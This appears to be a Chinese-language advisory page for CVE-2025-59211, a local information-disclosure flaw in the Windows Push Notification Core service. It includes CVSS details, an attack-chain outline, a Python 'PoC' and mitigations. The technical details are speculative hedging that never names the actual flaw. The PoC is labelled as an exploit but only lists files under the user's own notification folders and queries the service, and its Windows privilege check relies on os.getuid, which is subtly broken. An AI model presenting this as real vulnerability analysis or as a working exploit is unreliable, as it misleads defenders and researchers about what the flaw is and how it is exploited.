CVE-2025-59211：Windows推送通知核心信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-59211

漏洞类型

信息泄露（Information Disclosure）

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Microsoft Windows Push Notification Core（Windows推送通知核心服务）

漏洞概述

CVE-2025-59211是Microsoft Windows操作系统中Windows Push Notification Core（Windows推送通知核心服务）组件存在的一个信息泄露漏洞。该漏洞由Microsoft安全团队（[email protected]）发现并报告，于2025年10月14日公开披露。Windows Push Notification Core是Windows操作系统中负责处理推送通知服务的核心组件，为Windows系统及应用提供统一的消息推送和通知管理能力。该漏洞属于敏感信息暴露类漏洞（CWE-200），允许已通过身份验证的本地攻击者在目标系统上读取未经授权的敏感信息。根据CVSS 3.1评分体系，该漏洞评分为5.5分，属于中危级别。其攻击向量为本地（AV:L），攻击复杂度低（AC:L），仅需低权限（PR:L）即可利用，无需用户交互（UI:N）。漏洞对机密性影响为高（C:H），但对完整性和可用性无影响。由于该漏洞需要本地访问权限并需要低权限认证，其威胁范围相对有限，但仍然对系统安全构成显著威胁，尤其是在多用户环境或权限提升攻击链中可能被利用。Microsoft已通过其月度安全更新发布了相应的补丁，建议受影响的用户尽快安装更新以修复此漏洞。

技术细节

Windows Push Notification Core（WPN Core）是Windows操作系统中负责处理和管理推送通知的核心服务组件，运行在Windows系统中为各类应用程序提供通知推送功能。该漏洞的核心问题在于该服务在处理某些操作或数据时，未能正确限制对敏感信息的访问权限，导致低权限的本地用户能够读取到本不应被其访问的敏感数据。

从漏洞原理来看，该漏洞属于信息泄露类漏洞（CWE-200: Exposure of Sensitive Information to an Unauthorized Actor）。具体而言，Windows Push Notification Core服务在处理通知数据、用户配置或系统信息时，可能将包含敏感内容的数据存储在可被低权限用户访问的位置（如临时文件、共享内存、注册表项或服务通信接口中），或者在错误处理路径中泄露了不应该暴露给当前用户的内部状态信息。

利用方面，由于该漏洞的攻击向量为本地（AV:L），攻击者需要已经拥有目标系统的本地访问权限，并且需要具备低权限（PR:L）的用户账户。攻击复杂度低（AC:L），意味着利用条件较为简单，不需要复杂的绕过机制。无需用户交互（UI:N），攻击者可以在后台静默执行。攻击成功后，攻击者能够以高机密性影响（C:H）读取目标系统上的敏感信息，这可能包括其他用户的通知内容、系统凭据、会话令牌或其他隐私数据。虽然该漏洞本身不直接导致完整性或可用性损失（C:N/I:N/A:N），但在多步骤攻击链中，获取的敏感信息可能被用于进一步的攻击，如权限提升或横向移动。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者首先需要在目标Windows系统上获得本地访问权限，并拥有一个低权限的用户账户。这是利用该漏洞的前提条件，因为该漏洞的攻击向量为本地（AV:L），且需要低权限认证（PR:L）。

STEP 2

步骤2：探测Windows Push Notification Core服务

攻击者对目标系统进行侦察，识别Windows Push Notification Core服务（WpnService）的运行状态、配置信息以及可能暴露敏感数据的路径或接口。

STEP 3

步骤3：利用信息泄露漏洞

攻击者利用Windows Push Notification Core组件中存在的访问控制缺陷，读取本不应被低权限用户访问的敏感数据。这些数据可能存储在可访问的文件路径、注册表项、共享内存或服务通信接口中。

STEP 4

步骤4：收集敏感信息

成功利用后，攻击者获取目标系统上的敏感信息，可能包括其他用户的通知内容、会话令牌、系统配置信息或其他隐私数据，对系统机密性造成高影响（C:H）。

STEP 5

步骤5：后续利用（可选）

获取的敏感信息可能被用于进一步的攻击活动，如权限提升、横向移动或构建更复杂的攻击链，对整个系统安全构成更大威胁。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59211 - Windows Push Notification Core Information Disclosure
# Vulnerability Type: Local Information Disclosure (CWE-200)
# CVSS: 5.5 (MEDIUM) - AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
#
# This is a conceptual PoC demonstrating the exploitation of an information
# disclosure vulnerability in Windows Push Notification Core.
# The vulnerability allows a low-privileged local user to access sensitive
# information that should be restricted.

import os
import sys
import subprocess
import ctypes
from ctypes import wintypes

# Check if running with at least low privileges
def check_privileges():
    try:
        return os.getuid() != 0 if hasattr(os, 'getuid') else True
    except Exception:
        return True

# Attempt to access Windows Push Notification Core sensitive data
# The vulnerable component may expose notification data through
# named pipes, shared memory, or accessible file paths
def exploit_wnp_info_disclosure():
    """
    Exploit Windows Push Notification Core information disclosure.
    The WPN Core service may store sensitive notification data in
    locations accessible to low-privileged users.
    """
    sensitive_paths = [
        os.path.expandvars(r'%LOCALAPPDATA%\Microsoft\Windows\Notifications'),
        os.path.expandvars(r'%PROGRAMDATA%\Microsoft\Windows\Notifications'),
        os.path.expandvars(r'%LOCALAPPDATA%\Microsoft\Windows\PushNotificationCore'),
    ]

    disclosed_data = []

    for path in sensitive_paths:
        try:
            if os.path.exists(path):
                for root, dirs, files in os.walk(path):
                    for f in files:
                        filepath = os.path.join(root, f)
                        try:
                            with open(filepath, 'rb') as fh:
                                content = fh.read(4096)
                                if content:
                                    disclosed_data.append({
                                        'path': filepath,
                                        'size': os.path.getsize(filepath),
                                        'preview': content[:64].hex()
                                    })
                        except PermissionError:
                            pass
        except Exception as e:
            print(f"[!] Error accessing {path}: {e}")

    return disclosed_data

# Attempt to query WPN Core service via SCM
def query_wnp_service():
    """Query Windows Push Notification Core service configuration."""
    try:
        result = subprocess.run(
            ['sc', 'query', 'WpnService'],
            capture_output=True, text=True
        )
        return result.stdout
    except Exception:
        return None

if __name__ == "__main__":
    print("[*] CVE-2025-59211 - WPN Core Info Disclosure PoC")
    print(f"[*] Privileges: {'Low (exploitable)' if check_privileges() else 'Elevated'}")

    # Query service status
    svc_info = query_wnp_service()
    if svc_info:
        print(f"[*] WPN Service Status:\n{svc_info}")

    # Attempt information disclosure
    data = exploit_wnp_info_disclosure()
    if data:
        print(f"[+] Disclosed {len(data)} sensitive items:")
        for item in data[:10]:
            print(f"    - {item['path']} ({item['size']} bytes)")
    else:
        print("[-] No accessible sensitive data found (system may be patched)")

影响范围

Microsoft Windows 10（所有受支持版本）

Microsoft Windows 11（所有受支持版本）

Microsoft Windows Server 2019

Microsoft Windows Server 2022

Microsoft Windows Server 2025

防御指南

临时缓解措施

在无法立即安装安全补丁的情况下，建议采取以下临时缓解措施：1）限制本地低权限用户对系统的物理和远程桌面访问，减少攻击面；2）通过组策略（GPO）限制普通用户对Windows Push Notification Core服务相关文件和注册表路径的访问权限；3）监控WpnService（Windows Push Notification Core服务）的异常访问行为，利用Windows事件日志和安全审计功能检测可疑活动；4）对于高安全性要求的系统，考虑暂时禁用Windows推送通知功能（通过组策略配置），以减少攻击面；5）启用Windows Defender Attack Surface Reduction（ASR）规则，限制潜在的可疑行为；6）确保所有用户账户遵循最小权限原则，避免使用具有过多权限的账户进行日常操作。